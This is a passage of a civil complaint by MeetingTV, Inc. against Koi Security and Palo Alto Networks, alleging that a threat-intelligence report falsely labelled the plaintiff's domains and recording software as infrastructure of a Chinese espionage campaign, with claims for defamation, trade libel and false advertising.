Plaintiff's infrastructure) to ShadyPanda, core DarkSpectre infrastructure, via a purported "Twitter X Video Downloader" extension.

100.  No extension matching that name or the described functionality — communication with infinitynewtab.com and theft of meeting data — appears among the 17 extension IDs listed in the Report. Technical analysis of the closest third-party extension ("Twiter X Video Downloader") revealed no such communication or capability. Koi has never produced any extension ID or other evidence corresponding to the described functionality.

101.  This fabricated pivot was a false correlation characteristic of AI hallucinations in automated threat-correlation systems — that Koi published as verified investigative fact without any human verification or basic due diligence. Because the extension Koi described does not exist, Koi necessarily could not have examined or technically verified the critical claims it made about the extension's behavior before publishing it to the world.

102.  Plaintiff's CEO Michael Robertson emailed Koi CEO Amit Assaraf and CTO Idan Dardikman on February 18, 2026, specifically asking for the extension ID of the software that allegedly communicated with infinitynewtab.com. Neither responded. Exhibit 23.

103.  This unsupported linkage served as the essential linchpin that transformed Plaintiff's legitimate webinar and recording tools into alleged components of a Chinese criminal espionage network. Its exposure demonstrates both the falsity of Koi's core attribution and Koi Defendants' and Koi Individual Defendants' reckless disregard for the truth — particularly their failure to perform any verification of the pivotal extension they repeatedly cited as fact.

///

///

///

///

3:26-cv-01705-AJB-MMP

## X.   THE STATEMENTS WERE FALSE, UNVERIFIED, AND PUBLISHED IN RECKLESS DISREGARD OF THE TRUTH

104.   Koi's core attributions — that Plaintiff's infrastructure constituted the Zoom Stealer campaign and formed part of a Chinese criminal espionage operation — were factually false.

### A. Core Factual Falsities

105.   In the Report's dedicated "Attribution: The Chinese Connection" section, Koi stated "Everything we've uncovered points in one direction - a well-resourced Chinese operation". The Report then made the following specific assertions, each of which is demonstrably false as applied to Plaintiff. Exhibit 1 at 19.

| *Koi's Assertion in the Report About Plaintiff* | *The Truth About Plaintiff* |
|---|---|
| Servers hosted in China | No servers in China, all in the US |
| Registration in Chinese Provinces | No registration in China, Registration with the US Copyright Office |
| Chinese language strings throughout the codebase | No Chinese language strings in codebase, only English |
| Chinese comments and variable names | No Chinese comments or variable names |
| Development patterns consistent with Chinese timezone activity | Development does not follow Chinese timezone patterns. |
| Targeting affiliate fraud schemes for Chinese e-commerce platforms (JD.com, Taobao) | Software contains no such affiliate fraud schemes, no affiliate codes whatsoever |
| URL pattern matching tuned to Chinese marketplace structures | Plaintiff's software contains no such URL patterns |

23

106.    Among the most damaging falsity was the Report's explicit claim that: "The operation used a legitimate recording service Zoomcorder.com - as its public-facing front, lending credibility to the infrastructure while serving as a monetization channel." Exhibit 1 at 12.

107.    By labeling Zoomcorder.com (Plaintiff's legitimate product) as a "public-facing front" for the alleged Chinese criminal, Koi Defendants and Koi Individuals necessarily implied that Plaintiff's service was:

- a deliberate facade or cover for criminal activity;
- operated or controlled by the threat actor to disguise malicious operations;
- used to launder credibility and generate revenue for the criminal enterprise; and
- not a genuine business, but rather a front company facilitating corporate espionage and data theft.

108.    These implications are entirely false. Plaintiff's Zoomcorder service is a legitimate, user-directed personal recording tool that operates transparently on Google Cloud infrastructure, records meetings only at the explicit direction and with the credentials of authorized subscribers, and has no connection whatsoever to any malware campaign, threat actor, or criminal organization. Plaintiff does not serve as a "front" for any entity, does not facilitate espionage or data exfiltration, and does not monetize or lend credibility to any malicious infrastructure.

109.    The pivotal "Twitter X Video Downloader" extension that supposedly linked everything to ShadyPanda does not exist as described in Section IX.

**B. Koi's Reckless Failure to Verify and Violation of the Standard of Care**

110.    Koi published these serious accusations of criminal espionage and malware infrastructure without performing even the most basic due diligence required by industry standards for professional cybersecurity threat intelligence and attribution. As an experienced cybersecurity firm holding itself out as an expert in browser extension

3:26-cv-01705-AJB-MMP

analysis and AI-driven investigations, Koi had both the capability and the professional obligation to verify its claims before publication.

111. Koi failed to verify the existence or functionality of the critical pivot extension. Koi repeatedly cited a "Twitter X Video Downloader".

112. Koi failed to examine Plaintiff's publicly available software. Had Koi downloaded and analyzed the extensions it accused of being malicious (a trivial and standard step in extension research), it would have immediately seen that they contained only English strings, comments, and variable names — with zero Chinese language artifacts.

113. Koi failed to trace the actual network activity and infrastructure. The very domains and endpoints Koi listed as Chinese C2 infrastructure (meetingtv.us, webinarstvus.cloudfunctions.net, zoocorder.firebaseio.com) are well-known Google Cloud and Firebase domains. Simple DNS lookups, WHOIS queries, and traffic analysis would have immediately revealed they resolved to U.S.-based Google infrastructure — not Alibaba Cloud or any Chinese providers.

114. Koi disregarded Plaintiff's own public disclosures. The Chrome Web Store listings for Plaintiff's extensions openly described their legitimate functionality (webinar recording and recommendations), which Koi even screenshot in the Report but then ignored.

115. These were not obscure or difficult-to-access facts. They were basic, readily verifiable technical truths that any competent researcher — let alone one operating an AI-powered "Wings" analytical platform and claiming expertise in extension analysis — could and should have confirmed with minimal effort. Koi's wholesale failure to perform these elementary verification steps fell far below the applicable standard of care in the cybersecurity threat intelligence industry and constitutes reckless disregard for the truth.

116. Koi never contacted Plaintiff prior to publication, despite Plaintiff's readily available public contact information, Chrome Web Store developer details, and transparent business presence.

## C. Reliance on Known-Unreliable AI Tools

117.    Upon information and belief, the false correlations originated from Koi's own "Wings" AI analytical platform. Automated threat-correlation systems are widely known in the cybersecurity industry to generate "hallucinations" — false relationships that do not exist in the underlying data. Industry standards require rigorous human forensic validation before publishing AI-generated attributions as fact. Koi knowingly disregarded these standards and published the unverified AI outputs as definitive investigative findings.

## XI.    CRIMINAL ALLEGATIONS (DEFAMATION PER SE)

118.    Koi's statements go far beyond technical criticism. The Report expressly accuses Plaintiff of serious criminal conduct, including:

- Operating "corporate espionage infrastructure";
- Participating in a "well-funded criminal organization";
- Stealing corporate meeting intelligence, credentials, participant lists, and other sensitive data from millions of users;
- Facilitating unauthorized interception of confidential corporate communications; and
- Serving as a "front" for a Chinese-linked malware and espionage campaign.

119.    These are not opinions or loose metaphors. In the context of a detailed technical report that lists Plaintiff's exact domains and software as Indicators of Compromise for a named criminal operation, they constitute verifiable assertions of criminal activity. Under California law, false accusations of criminal conduct constitute defamation per se. They also directly injure Plaintiff in its trade or business.

120.    Koi published these criminal accusations as verified investigative fact, without verification, and with reckless disregard for their falsity. The statements are therefore actionable as defamation per se, independent of any requirement to plead special damages.

26

3:26-cv-01705-AJB-MMP

121.    In the cybersecurity industry, statements identifying specific domains, software, or infrastructure as "malware," "command-and-control," or components of a named criminal operation are not understood as opinion or conjecture. They are treated as objective, verifiable factual assertions that such infrastructure is actively engaged in malicious activity. These classifications are relied upon as factual determinations by security vendors, automated enforcement systems, and enterprise customers, and they trigger immediate operational consequences, including blocking and denial of service. Accordingly, Defendants' statements are actionable statements of fact, not protected opinion.

## XII.    POST-PUBLICATION CONDUCT, INADEQUATE CORRECTIONS, AND ONGOING REPUBLICATION

122.    Koi Defendants' and Palo Alto's actions after receiving notice of the falsity of the DarkSpectre Report demonstrate both ratification of the original defamatory statements and independent liability.

### A. Koi's Inadequate and Misleading February 12, 2026 "Update" and Pattern of Evasive, Half-Measure Responses to Retraction Demands

123.    On February 11, 2026, Plaintiff sent formal demands for retraction through Defendants' official web contact form on the Koi.ai website and via email to hello@koi.ai. Exhibit 26. The demand letter, authored by MeetingTV CEO Michael Robertson, expressly identified the false and defamatory statements in the December 30, 2025, DarkSpectre Report, including the false attribution of Plaintiff's systems and services to the Zoom Stealer campaign, corporate espionage, data exfiltration, and integration into the broader DarkSpectre/ShadyPanda Chinese criminal operation. It demanded immediate removal of the publication, a full retraction, written confirmation within seven days, and a litigation hold. No response was received to either the web form submission or the hello@koi.ai email.

124.    On February 12, 2026, Mr. Robertson attempted direct contact with Defendant Amit Assaraf (Koi's CEO) by sending the retraction demand to several email

27

addresses, including amit@koi.ai. The email included the prior demand and stated: "I wanted to make sure you saw this demand regarding this ultra serious issue. The blog post your company did talking about my company MeetingTV was false and defamatory and did considerable damage which is increasing every day." Exhibit 27. The email to amit@koi.ai did not bounce or come back as undeliverable.

125. Defendant Assaraf responded the same day: "Hey Michael, I missed your email, let me look into this, we did not mean to cause any harm and I'll make sure to fix this asap internally." Exhibit 9. Mr. Robertson replied, highlighting the shocking irresponsibility of publishing without prior contact, Plaintiff's prominent U.S. corporate contact information, and the widespread blocking and reputational harm already inflicted. Exhibit 28.

126. Assaraf then provided a more detailed response (with Koi CTO Idan Dardikman copied):

> Hey Michael, we've checked this internally, Idan our CTO is CC'd. First off, I'd like to notify you that the reference to your domain (which was the only reference to MeetingTV inside the blog) was removed from the IOCs list for good faith. … That said, as we understand your concerns, we've decided to remove it and update the blog with a short statement to clarify that to our knowledge there is no connection between MeetingTV and the malicious threat actors. … Sorry for the inconvenience this may have caused, but as mentioned, we've never claimed that there was any relation between the threat actor and your company.

Exhibit 19.

127. This response was internally inconsistent and legally insufficient. It admitted removal of one domain "for good faith" while simultaneously asserting there had been "no mistake" in the original IOCs because the domain appeared in malware code. It disclaimed any direct accusation against MeetingTV yet left the entire surrounding narrative of the Zoom Stealer campaign — corporate espionage, stolen meeting intelligence, exfiltration to Firebase and Google Cloud infrastructure, and linkage to the Chinese DarkSpectre operation — intact. Mr. Robertson immediately replied that the

partial measure was insufficient, specifically identifying remaining false claims regarding shared infrastructure, stolen data, webinarstvus.cloudfunctions.net, and zoocorder.firebaseio.com, and demanding proactive outreach to security vendors to reverse blocks. Exhibit 29.

128.    Rather than issue a full retraction, notify downstream recipients, or meaningfully correct the record, Defendants performed a stealth edit to the 32-page Report on or about February 12, 2026. They left the original publication date unchanged, made no visible indication of correction on the blog post itself, and inserted only a single short paragraph on page 20:

> Update (February 12, 2026): After publication, we conducted additional validation regarding the domain meetingtv[.]us, which was originally included in the IOC list. While the domain appeared in code analyzed during our investigation, we have determined that there is no evidence that this domain is connected or related in any way to the malicious infrastructure or the threat actor group described in this report.

Exhibit 22.

129.    This "update" was grossly inadequate and affirmatively misleading. Defendants removed some (but far from all) of Plaintiff's artifacts, deleted limited sections referencing the Zoom Stealer infrastructure, yet preserved the core defamatory narrative: the Zoom Stealer as corporate espionage infrastructure tied to DarkSpectre, the claim of 2.2 million users' worth of stolen meeting data, the linkage through software artifacts, and all of the Plaintiff's other endpoints. They provided no similar clarification for webinarstvus.cloudfunctions.net, zoocorder.firebaseio.com, or Plaintiff's software. Minor additional changes were scattered throughout the document in a manner undetectable without line-by-line comparison.

130.    Critically, Defendants took no proactive steps to contact or correct the numerous security vendors, threat intelligence feeds, network operators, and automated systems (including Palo Alto Networks) that had already ingested the original false IOCs and were actively blocking Plaintiff's services worldwide. In the cybersecurity

3:26-cv-01705-AJB-MMP

ecosystem, partial, buried, and internally contradictory "updates" do not displace the original publication; they compound the defamation by signaling continued suspicion while failing to provide the clear, conspicuous retraction necessary to reverse automated classifications and reputational harm.

131.    The timeline and substance of Defendants' responses demonstrate bad faith and conscious avoidance rather than good-faith correction. Assaraf's initial assurances of an internal fix and "good faith" removal were followed only by cosmetic, self-serving edits that left the defamatory sting intact. This pattern of half-measures, evasion, and failure to mitigate foreseeable downstream harm directly supports Plaintiff's claims of actual malice, ratification, and ongoing republication.

**B. Continued Dissemination Through KoiDex**

132.    Koi continued to publish and distribute the false classifications through its publicly marketed Koidex threat intelligence database even after its purported February 12, 2026, "update." Despite publicly stating there was "no evidence" linking meetingtv.us to malicious activity, Koidex still contains at least seven (7) records marking meetingtv.us as malicious, at least eight (8) records for webinarstvus.cloudfunctions.net, and at least two (2) records for zoocorder.firebaseio.com.

133.    By maintaining these malicious designations in its own commercial security tool after receiving actual notice of their falsity — and after its own admission of "no evidence" — Koi has engaged in ongoing republication and ratification of the false statements. This conduct directly contradicts Koi's limited public update, renders it ineffective, and constitutes independent actionable publications. It further demonstrates Defendants' reckless disregard for the truth and the continuing harm to Plaintiff.

**C. Palo Alto's Independent Wrongful Conduct and Successor Liability**

134.    Defendant Palo Alto independently republished and continues to republish false and defamatory classifications of Plaintiff's infrastructure after acquiring Koi on or about April 14, 2026, and after receiving actual notice of falsity thereafter. Palo Alto's

30

threat intelligence and URL filtering systems classify meetingtv.us and webinarstvus.cloudfunctions.net as "Malware," defined in its system as: "Sites containing or known to host malicious content, executables, scripts, viruses, trojans, and code." It labels zoocorder.firebaseio.com as "Command-and-Control" (or "C2"), defined as: "domains used by malware and/or compromised systems to surreptitiously communicate with an attacker's remote server to receive malicious commands or exfiltrate data." (collectively, the "**Malware and C2 Classifications**"). These designations are affirmative statements of fact asserting that Plaintiff's infrastructure hosts malicious content and actively communicates with attackers to exfiltrate data. Exhibit 12.

135.   Palo Alto maintained these classifications after: (1) Koi's own February 12, 2026, admission of "no evidence" linking meetingtv.us to malicious activity; (2) formal notice from Plaintiff's counsel on April 15, 2026; and (3) direct notice from Plaintiff's CEO to Palo Alto CEO Nikesh Arora on April 28, 2026. Palo Alto's continued publication and distribution of these classifications through its products and services after actual knowledge of falsity constitutes independent, knowing or reckless republication. Each dissemination through Palo Alto's systems is a separate actionable publication. Exhibit 24, Exhibit 25.

136.   Palo Alto's liability is not derivative. It independently verified, adopted, integrated, and continues to disseminate the false IOC designations and Malware/C2 classifications in its own commercial threat intelligence offerings. This independent conduct provides a standalone basis for liability under every cause of action asserted herein, separate and apart from successor liability. In addition, Palo Alto is liable as Koi's successor because it acquired Koi's core threat intelligence business, retained key personnel and technology, continued the same operations, and has benefited from the Report and its underlying data.

137.   Palo Alto's independent republication after actual notice constitutes separate actionable conduct that does not depend on Koi's original publication.

///

3:26-cv-01705-AJB-MMP

### D. Successor Liability

138.   In addition to its independent liability, Palo Alto is liable as Koi's successor. It acquired Koi's core threat intelligence business, retained key personnel and technology, continued the same operations, and has benefited from the Report and its underlying data. Palo Alto assumed the liabilities arising from Koi's wrongful conduct.

### E. Actual Notice and Failure to Remediate

139.   Plaintiff provided Palo Alto with direct, detailed notice of the falsity of the underlying attributions and the ongoing harm caused by the Malware and C2 Classifications. Palo Alto failed to investigate, correct, retract, or notify downstream users. This ongoing republication after actual notice demonstrates, at minimum, reckless disregard for the truth.

## XIII.   IOC DESIGNATION, FORESEEABLE SECURITY CASCADE, AND VENDOR RELIANCE

140.   The Report identified Plaintiff's domains and infrastructure as Indicators of Compromise ("IOCs") associated with the alleged Zoom Stealer campaign. In the cybersecurity industry, an IOC designation is a term of art signaling that a domain, endpoint, or artifact is malicious and should be blocked or treated as a threat.

141.   Koi Defendants' IOC designations were specifically designed to be ingested and acted upon automatically by security vendors and network operators. The downstream blocking and classifications that followed were not independent or unforeseeable — they were the direct, intended, and foreseeable consequence of publishing the Report. Koi knew or reasonably should have known that labeling Plaintiff's infrastructure as part of a Chinese criminal espionage campaign would trigger widespread automated blocking and reputational harm. Prior to the Report, no entities were blocking Plaintiff's domains or software identified in the Report.

142.   The harm was amplified because Koi not only flagged the domains as IOCs but also characterized Plaintiff's legitimate business as a "public-facing front" for criminal activity. This combination of technical and criminal accusations made Plaintiff

appear as an untrustworthy and illegitimate actor, rendering blocking and exclusion both predictable and inevitable.

143.   Security vendors and network operators in fact relied on the Report. Vendors that ingested Koi's false IOCs and classifications included, DNSFilter, Cloudflare, Fortinet, Palo Alto Networks, Verizon, Cisco, Spectrum (Charter Communications), Airtel, and others. When Plaintiff asked DNSFilter to remove the malicious classification, DNSFilter expressly cited the Koi Report as the basis for its decision and refused to delist Plaintiff. Exhibit 15.

144.   This created a circular reliance problem: vendors relied on Koi's Report for their classifications, while Koi failed to issue an adequate correction or retraction. As a result, Plaintiff's domains remained blocked and labeled as malicious even after Koi's limited February 2026 "update." Koi's conduct was a substantial factor in causing and perpetuating Plaintiff's harm.

## XIV.   ACTUAL MALICE

145.   Koi published and continues to publish the false statements at issue with actual malice — that is, with knowledge of their falsity or with reckless disregard for the truth. *New York Times Co. v. Sullivan*, 376 U.S. 254 (1964); *Harte-Hanks Commc'ns, Inc. v. Connaughton*, 491 U.S. 657 (1989).

### A. Pre-Publication Recklessness

146.   Koi knowingly relied on its own "Wings" AI platform to generate the core correlations in the Report, despite industry-wide recognition that such automated tools frequently produce "hallucinations" — false relationships that do not exist in the data. Koi published these unverified AI outputs as definitive investigative fact without:

a.   Performing basic human forensic validation;

b.   Verifying the existence of the critical "Twitter X Video Downloader" pivot extension (which does not exist);

c.   Confirming any actual communication between Plaintiff's systems and alleged ShadyPanda domains;

3:26-cv-01705-AJB-MMP

d. Considering obvious innocent explanations for the presence of Plaintiff's code or domains;

e. Contacting Plaintiff prior to publication, even though Plaintiff's contact information was publicly available.

147. These failures occurred even though Koi was accusing a legitimate California company of operating core infrastructure for a Chinese criminal espionage campaign. Such conduct constitutes reckless disregard for the truth.

## B. Commercial Motive and Acquisition Pressure

148. The Report was not published in a vacuum. It was released during Koi's active acquisition negotiations with Palo Alto Networks and was expressly designed to showcase the capabilities of Koi's Wings AI platform. By manufacturing a sensational narrative of a massive Chinese espionage operation — and positioning Wings as the only solution capable of detecting it — Koi sought to inflate its valuation and generate sales leads. This strong economic incentive further supports an inference of reckless disregard. See Section V (Commercial Speech), *supra*.

## C. Post-Publication Conduct Demonstrating Knowledge of Falsity

149. After Plaintiff notified Koi of the errors on February 11–12, 2026, Koi issued a limited "update" that disclaimed one domain while preserving the broader defamatory narrative. Koi continued to maintain Plaintiff's malicious classifications in its Koidex database despite its own "no evidence" statement. Palo Alto Networks continued publishing false Malware and C2 classifications after receiving actual notice on multiple occasions.

## D. Cumulative Evidence of Reckless Disregard

150. Taken together, Defendants' reliance on automated analytical tools known to produce false correlations, failure to verify the critical pivot extension, disregard of Plaintiff's public disclosures, absence of any pre-publication contact, and inadequate post-notice response establish reckless disregard for the truth. This satisfies the actual malice standard.

3:26-cv-01705-AJB-MMP

## XV.   KOI DEFENDANTS' COMMERCIAL SPEECH CONSTITUTES FALSE ADVERTISING

151.   As alleged in Section V, Koi Defendants' publication of the DarkSpectre Report constituted commercial speech under *Bolger v. Youngs Drug Products Corp.*, 463 U.S. 60 (1983), and *Kasky v. Nike, Inc.*, 27 Cal. 4th 939 (2002), and was disseminated for the purpose of influencing purchasing decisions and market behavior. Because the publication was commercial speech, the false and misleading representations contained therein are actionable under the Lanham Act, 15 U.S.C. § 1125(a), and analogous state law.

152.   Koi Defendants made specific false and misleading representations of fact, including statements that Plaintiff's infrastructure was malicious, associated with a cyber-espionage campaign, and part of a coordinated criminal operation. These statements were presented as the result of technical analysis and were intended to be understood by readers as objective, verifiable findings.

153.   Courts have recognized that representations characterizing software or infrastructure as malicious may constitute actionable statements of fact when made in a commercial context. *See, Enigma Software Group USA, LLC v. Malwarebytes, Inc.*, 946 F.3d 1040 (9th Cir. 2019). The Ninth Circuit has further held that statements presented as objective, verifiable facts—rather than opinion—are actionable under the Lanham Act when they are false or misleading. *See, Southland Sod Farms v. Stover Seed Co.*, 108 F.3d 1134 (9th Cir. 1997). Koi Defendants' statements here were presented as factual technical determinations and fall squarely within these principles.

154.   Koi Defendants disseminated these statements to an audience that included actual and potential customers, including enterprises, cybersecurity professionals, security vendors, and network operators who rely on threat intelligence in evaluating risk and selecting cybersecurity solutions. Koi Defendants intended that these statements would influence purchasing decisions, platform integrations, and security classifications.

3:26-cv-01705-AJB-MMP

155. The deception was material. In the cybersecurity market, classifications such as "Malware" and "Command-and-Control" are treated as factual determinations and are relied upon in making purchasing decisions and implementing security controls. By falsely identifying Plaintiff's infrastructure as malicious, Koi Defendants materially misrepresented both Plaintiff's services and the nature of the threats that Koi Defendants' products purportedly detect.

156. Koi Defendants caused these statements to enter interstate commerce through publication on their website, distribution through marketing channels, and dissemination through threat intelligence systems relied upon by third parties.

157. Koi Defendants' false statements were not incidental to the Report but were integral to its commercial purpose. By portraying Plaintiff as part of a sophisticated criminal operation, Koi Defendants increased the perceived need for their own products and services and enhanced the market value of their offerings.

158. As a direct and proximate result of Koi Defendants' false and misleading representations, Plaintiff has suffered and continues to suffer injury, including loss of customers, loss of goodwill, reputational harm, and interference with business relationships.

## XVI. CAUSES OF ACTION

159. The causes of action set forth below are based on overlapping facts but distinct legal theories. Plaintiff seeks recovery for reputational harm arising from defamatory statements and for economic injury arising from disparagement of its products and services.

160. The structure and detail of this Complaint reflect the technical nature of Koi Defendants' allegations and the complexity of cybersecurity attribution. Each factual section is included to provide clarity, specificity, and a complete understanding of the basis for Plaintiff's claims, and is organized to correspond directly to the elements of the causes of action asserted herein.

///

3:26-cv-01705-AJB-MMP

<div align="center">

**COUNT I**

**Defamation Per Se**

(Against Koi Defendants and Palo Alto)

</div>

161.   Plaintiff incorporates by reference all preceding paragraphs as though fully set forth herein.

162.   Koi Defendants published false statements of fact concerning Plaintiff that were defamatory per se. The DarkSpectre Report expressly defined the entire "Zoom Stealer" campaign — described as corporate espionage infrastructure responsible for stealing meeting data from 2.2 million users — through Plaintiff's own domains, endpoints, and software. It then folded that campaign into a "well-resourced Chinese criminal organization" called DarkSpectre. These statements accused Plaintiff of operating malicious infrastructure, participating in corporate espionage, credential theft, and unlawful interception of communications.

163.   The statements were presented as verified investigative findings, not opinion or speculation. In the cybersecurity industry, designating specific domains and code as IOCs for a named criminal campaign constitutes an attribution of responsibility. A reasonable reader would understand the Report as identifying Plaintiff as knowingly involved in Chinese-linked criminal espionage. *See, Blatty v. New York Times Co.*, 42 Cal. 3d 1033 (1986).

164.   Koi published these statements with actual malice — knowledge of falsity or reckless disregard for the truth — as detailed in Section XII.

165.   Palo Alto independently republished and continues to republish the malware and C2 Classifications (as defined in Section XI) after receiving actual notice of their falsity.

166.   As a direct and proximate result, Plaintiff has suffered reputational harm, loss of goodwill, and severe business disruption. Koi Defendants' statements, as independently republished by Palo Alto after actual notice, constitute defamation per se

3:26-cv-01705-AJB-MMP

under California law. Plaintiff is entitled to general damages, presumed damages, and punitive damages.

## COUNT II

### Trade Libel / Commercial Disparagement

(Against Koi Defendants and Palo Alto)

167. Plaintiff incorporates by reference all preceding paragraphs as though fully set forth herein.

168. Koi Defendants published false statements disparaging the quality, safety, and legitimacy of Plaintiff's products and services by labeling them as "malware," "command and control" and components of a criminal espionage operation and continues to do so through its Koidex platform. See Section XI.B., supra. These statements were made in a commercial context, were intended to be relied upon by customers and vendors, and were published with actual malice. Third parties did rely on them, resulting in widespread blocking of Plaintiff's services.

169. Palo Alto published the false Malware and C2 Classifications (as defined in Section XI), thereby disparaging Plaintiff's products and services as malicious infrastructure. These statements were intended to be relied upon by customers and vendors, and were published with actual malice.

170. As a direct and proximate result, Plaintiff has suffered special damages, including lost customers, lost revenue, blocked access to its services, and interference with existing and prospective business relationships. Koi Defendants' and Palo Alto's conduct, including Palo Alto's independent republication of the Malware and C2 Classifications after actual notice, constitutes trade libel and commercial disparagement under California law.

///

///

////

///

3:26-cv-01705-AJB-MMP

## COUNT III

### False Advertising and Unfair Competition

(Lanham Act, 15 U.S.C. § 1125(a))

(Against Koi Defendants and Palo Alto)

171.    Plaintiff incorporates by reference all preceding paragraphs as though fully set forth herein.

172.    The DarkSpectre Report constitutes commercial speech and "commercial advertising or promotion" under the Lanham Act. *See* Section V, *supra*. It was part of Koi's established pattern of using sensationalized research reports — some overseen by CEO Amit Assaraf — as integrated sales collateral for its Wings AI platform.

173.    Koi Defendants made specific false and misleading representations of fact, including that Plaintiff's infrastructure and services were malicious, part of a Chinese criminal espionage campaign, and that only Koi's AI solution could protect against such threats to an audience of actual and potential customers for the purpose of influencing purchasing decisions regarding Koi Defendants' products and services and continues to do so through its Koidex platform. See Section XI.B., *supra*. These statements were material, actually deceived or had the tendency to deceive the relevant audience (enterprises, security vendors, and network operators), and were disseminated in interstate commerce.

174.    Palo Alto independently continued to publish the false and misleading representations of fact.

175.    As a direct and proximate result, Plaintiff has suffered injury to its commercial interests, including lost sales, lost goodwill, and reputational harm. Koi Defendants' and Palo Alto's conduct, including Palo Alto's independent republication of the false and misleading representations after actual notice, violates 15 U.S.C. § 1125(a).

176.    Plaintiff seeks damages, disgorgement of profits, and injunctive relief.

///

///

39

3:26-cv-01705-AJB-MMP

## COUNT IV

### Violation of California Unfair Competition Law

(Cal. Bus. & Prof. Code § 17200 et seq.)

(Against Koi Defendants and Palo Alto)

177.   Plaintiff incorporates by reference all preceding paragraphs as though fully set forth herein.

178.   Koi Defendants and Palo Alto engaged in unlawful, unfair, and fraudulent business practices. Their conduct is "unlawful" because it violates the Lanham Act and California common law (defamation and trade libel). It is "fraudulent" because it is likely to deceive the public and market participants who rely on threat intelligence. It is "unfair" because it offends established public policy, harms competition, and interferes with Plaintiff's ability to compete in the marketplace.

179.   As a direct and proximate result, Plaintiff has suffered injury in fact and lost money or property. Koi Defendants' and Palo Alto's unlawful, unfair, and fraudulent business practices, including Palo Alto's independent republication of the false statements and classifications after actual notice, entitle Plaintiff to restitution, injunctive relief, and all other remedies available under Section 17200.

## COUNT V

### Violation of California False Advertising Law

(Cal. Bus. & Prof. Code § 17500 et seq.)

(Against Koi Defendants and Palo Alto)

180.   Plaintiff incorporates by reference all preceding paragraphs as though fully set forth herein.

181.   Koi Defendants disseminated untrue and misleading statements concerning Plaintiff's services in connection with the promotion of their own goods and services. These statements were made with knowledge, or by the exercise of reasonable care should have been known, to be untrue or misleading. Palo Alto independently

3:26-cv-01705-AJB-MMP

republished those statements after actual notice. Plaintiff has suffered injury as a result. Plaintiff seeks restitution and injunctive relief under Section 17500.

<div align="center">

**COUNT VI**

**Defamation and Trade Libel**

(Against Palo Alto Only)

</div>

182.   Plaintiff incorporates by reference all preceding paragraphs as though fully set forth herein.

183.   Palo Alto independently published and continues to independently republish the Malware and C2 Classifications (as defined in Section XI) after receiving actual notice of their falsity. These statements are false, were made with reckless disregard for the truth, and have caused Plaintiff ongoing reputational and economic harm.

184.   Palo Alto's conduct constitutes defamation per se and trade libel under California law.

185.   As a direct and proximate result of Palo Alto's independent publication and republication of these false statements, Plaintiff has suffered, and continues to suffer, substantial damages, including reputational harm, loss of goodwill, lost customers, blocked access to its services, and interference with business relationships. Plaintiff is entitled to compensatory damages, punitive damages, and all other relief the Court deems just and proper.

## XVII.   DAMAGES

186.   Koi Defendants' misconduct was driven by substantial financial self-interest. Upon information and belief, the sensational and unverified claims in the DarkSpectre Report were published, at least in part, to inflate Koi's corporate valuation in advance of its acquisition by Palo Alto for approximately $400 million. This acquisition price reflects, in significant part, the perceived value of the AI-driven threat intelligence capabilities Koi Defendants promoted through their reckless reporting concerning Plaintiff. As a direct and proximate result of Defendants' conduct, Plaintiff has suffered, and continues to suffer, massive economic losses, including lost revenue, blocked

customer access, reputational harm, mitigation costs, and interference with existing and prospective business relationships. Plaintiff is entitled to compensatory damages, punitive damages, restitution, disgorgement of any portion of the acquisition value attributable to the wrongful conduct, and all other relief the Court deems just and proper.

187.   Plaintiff does not seek to restrain Koi Defendants from engaging in cybersecurity research or publishing lawful opinions. Rather, Plaintiff seeks narrowly tailored relief requiring the correction, retraction, and removal of demonstrably false factual statements and classifications that continue to cause ongoing harm. Such relief is directed at preventing the continued dissemination of false statements of fact, not at suppressing protected speech.

## PRAYER FOR RELIEF

WHEREFORE, Plaintiff respectfully requests judgment against Koi Defendants and Palo Alto, jointly and severally where applicable, as follows:

**Compensatory Damages**

1.   General damages for reputational harm, injury to business reputation, and loss of goodwill in an amount according to proof;

2.   Special damages for lost profits, lost customers, blocked services, and other economic harm in an amount according to proof;

3.   Damages arising from Palo Alto's independent ongoing Malware and C2 classifications of Plaintiff's domains and infrastructure, maintained and republished after actual notice of falsity;

**Punitive and Exemplary Damages**

4.   Punitive damages against each Defendant for their willful, malicious, and reckless conduct, in an amount sufficient to punish and deter similar misconduct;

**Injunctive and Equitable Relief**

5.   Preliminary and permanent injunctive relief requiring Defendants to:

a.   Issue a clear, prominent, and unequivocal retraction and corrective statement regarding all false and defamatory statements about Plaintiff;

b.      Remove or correct all references to Plaintiff's domains, endpoints, and software as malicious, IOCs, malware, or command-and-control infrastructure, including Palo Alto's independent ongoing Malware and C2 classifications in its threat intelligence and URL filtering systems, and complete removal of all such classifications from Koidex, Palo Alto's systems, and any successor databases;

c.      Notify, to the extent reasonably feasible, all known third-party recipients (including security vendors, threat intelligence platforms, and network operators) that ingested or relied upon the false statements that such statements were inaccurate and should be disregarded; and

d.      Cease any further publication or dissemination of the false statements or classifications concerning Plaintiff;

**Statutory Relief**

6.      Under the Lanham Act (15 U.S.C. § 1125(a)): damages, Defendants' profits, and injunctive relief;

7.      Under California Business & Professions Code §§ 17200 and 17500: restitution, disgorgement, and injunctive relief;

**Additional Relief**

8.      Pre- and post-judgment interest at the maximum legal rate;

9.      Reasonable attorneys' fees and costs as permitted by law; and

10.      Such other and further relief as the Court deems just and proper.

///

///

///

///

///

///

///

///

# JURY TRIAL DEMAND

Plaintiff MeetingTV, Inc. hereby demands a trial by jury on all issues so triable pursuant to Rule 38 of the Federal Rules of Civil Procedure.

Dated: May 12, 2026

Respectfully Submitted,

/s/ Bradley K. Moores
BRADLEY K. MOORES
Attorney for Plaintiff,
MEETINGTV INC.
E-mail: brad@bradleymoores.com

3:26-cv-01705-AJB-MMP

## EXHIBIT INDEX IN SUPPORT OF FIRST AMENDED COMPLAINT

Plaintiff MeetingTV, Inc. hereby submits the following index of exhibits referenced in the First Amended Complaint:

| Exhibit No. | Description |
| --- | --- |
| Exhibit 1 | DarkSpectre Unmasking the Threat Actor Behind 8.8 Million Infected Browsers-12-30-25 version from archive.org |
| Exhibit 2 | Koi Terms of Use (defining "Company" as Koi Security Inc. and Koi Security Ltd.) |
| Exhibit 3 | "Book a Demo" / sales funnel routing to U.S.-based personnel <amitya@koi.security> Feb 11, 2026, Reply, to mr@michaelrobertson.com |
| Exhibit 4 | "Copyright © 2025 Koi Security Inc." DarkSpectre Report |
| Exhibit 5 | "Copyright © 2026 Koi Security Inc." Source code / updated report DarkSpectre Report |
| Exhibit 6 | VP of Sales Amit Yampolsky LinkedIn / revenue role statements |
| Exhibit 7 | Koi CA Director of Sales Kuran Freyermuth LinkedIn |
